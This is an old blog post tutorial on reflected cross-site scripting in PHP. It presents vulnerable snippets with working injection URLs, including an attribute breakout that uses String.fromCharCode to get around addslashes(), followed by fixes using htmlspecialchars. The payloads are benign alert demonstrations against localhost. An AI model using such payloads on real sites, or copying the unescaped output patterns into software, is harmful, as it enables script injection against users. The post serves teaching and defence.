Saturday, March 26, 2011

Cross-Site Scripting

There are a lot of vectors and a lot of bypass methods you can try; you can find lists of them around the web.



Basic example
- Code snippet from test.php

---------------------------------
<?php
// Vulnerable: the "name" parameter is echoed into the page without any encoding.
$name = $_GET['name'];
print $name;
?>
---------------------------------

The input is not filtered, so an attacker can inject JavaScript code. Example:

http://127.0.0.1/test.php?name=<script>alert("XSS")</script>


A popup with the message XSS will be displayed; the JavaScript code was successfully executed.

Another example

- Code snippet from test.php

-------------------------------------------
<?php
// Vulnerable: addslashes() only puts a backslash before quotes; it does not
// encode " or > for HTML, so the value can still break out of the attribute.
$name = addslashes($_GET['name']);
print '<table name="'.$name.'"></table>';
?>
-------------------------------------------

Not an advanced example, only slightly more complicated.

http://127.0.0.1/test.php?name="><script>alert(String.fromCharCode(88,83,83))</script>

Why this vector? We put " because we must close the " of the "name" attribute
of the "table" tag, and > to close the "table" tag. Why String.fromCharCode? Because
we want to bypass the addslashes() function: it backslashes any quote we put inside
the JavaScript, but it does nothing to the HTML parser, so building the string from
character codes avoids quotes entirely. Injection done.

Simple example

- Code snippet from modules.php

---------------------------------------------------------------------------
// $name reaches this code unfiltered from the request and is echoed into the error message.
if (isset($name)) {
.................... etc................
} else {
    // Message (French): the file modules/<name>/<mod_file>.php does not exist
    die("Le fichier modules/".$name."/".$mod_file.".php est inexistant");
}
---------------------------------------------------------------------------

The "name" variable is injectable,input is not filtered,so we can inject
with ease Javascript code.Example :

http://127.0.0.1/test.php?name=<script>alert("XSS")</script>

How to fix?
Simple way: use the htmlentities() or htmlspecialchars() function.
Example: $name=htmlentities($_GET['name']);
Another way: filter all the special characters used for XSS (there are a lot of them).
The best way is the first method.
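As an added example (not code from the original post), here is the attribute-context snippet from the second example beside a fixed version that applies the first method, run against the post's payload. The function names and the sample inputs are my own; ENT_QUOTES is passed so that single quotes are encoded as well, which older PHP versions do not do by default.

```php
<?php
// Added example, not from the original post: vulnerable vs. fixed rendering of
// the "name" attribute from the second snippet, fed the post's own payload.

// Vulnerable: addslashes() only prepends backslashes; the HTML parser still
// sees the " and > characters and closes the attribute and the tag.
function render_vulnerable(string $name): string {
    $name = addslashes($name);
    return '<table name="' . $name . '"></table>';
}

// Fixed: htmlspecialchars() encodes & < > " and, with ENT_QUOTES, also ',
// so the browser treats the whole value as attribute text. The charset is
// given explicitly so the encoder and the page agree on the byte encoding.
function render_fixed(string $name): string {
    $name = htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
    return '<table name="' . $name . '"></table>';
}

// Simple check used below: did a <script> tag survive into the output?
function contains_script_tag(string $html): bool {
    return stripos($html, '<script') !== false;
}

// Constructed inputs: a harmless value and the payload from the post.
$inputs = [
    'users',
    '"><script>alert(String.fromCharCode(88,83,83))</script>',
];

foreach ($inputs as $input) {
    $vuln  = render_vulnerable($input);
    $fixed = render_fixed($input);
    echo "input:      $input\n";
    echo "vulnerable: $vuln\n";
    echo "            script tag present: " . (contains_script_tag($vuln) ? 'yes' : 'no') . "\n";
    echo "fixed:      $fixed\n";
    echo "            script tag present: " . (contains_script_tag($fixed) ? 'yes' : 'no') . "\n\n";
}
```

For the payload, the vulnerable output begins `<table name="\"><script>...`, so the backslash is harmless to the browser and the script runs, while the fixed output carries `&quot;&gt;&lt;script&gt;` and stays inside the attribute.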


This post originally from --  J|nX
